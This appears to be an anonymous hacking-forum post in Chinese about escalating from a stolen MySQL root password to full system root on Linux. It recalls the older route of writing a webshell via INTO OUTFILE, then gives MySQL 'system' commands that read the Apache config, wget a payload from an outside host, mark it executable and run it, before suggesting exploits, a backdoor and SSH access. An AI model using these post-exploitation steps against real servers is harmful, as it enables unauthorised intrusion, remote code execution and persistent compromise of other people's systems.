Anonymous (59.116.136.185) 1197046818|%e %b %Y, %H:%M %Z|agohover
in discussion Hacker / Hacking » linux 之 mysql 5.x 拿到 root passwd 的後續動作
以往拿到 mysql 的 root passwd, 都是先建立一個 table, 然後 outfile.
搞到一個 webshell, 再提升權限.
這些需要 web 的絕對路徑, 也有機會遇到 sql injecion 的部份.
mysql 5.x 有引入一個 system 函數, 可執行系統指令.
mysql>system vi /etc/httpd/conf/httpd.conf;
可拿到 web 的絕對路徑, 不過不是拿來搞 webshell 的, 可以搞更邪惡的東西.
mysql>system wget http://xxxx.xxx.com/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
這樣就把 mysql 的 root 換成 system root 了, 接下來要跑 exp, 裝 backboor, 開 ssh 進來 <用 mysql 的 root passwd> 都隨你搞了.
linux 之 mysql 5.x 拿到 root passwd 的後續動作 by Anonymous (59.116.136.185), 1197046818|%e %b %Y, %H:%M %Z|agohover
Anonymous (59.116.136.185), 1197046818|%e %b %Y, %H:%M %Z|agohover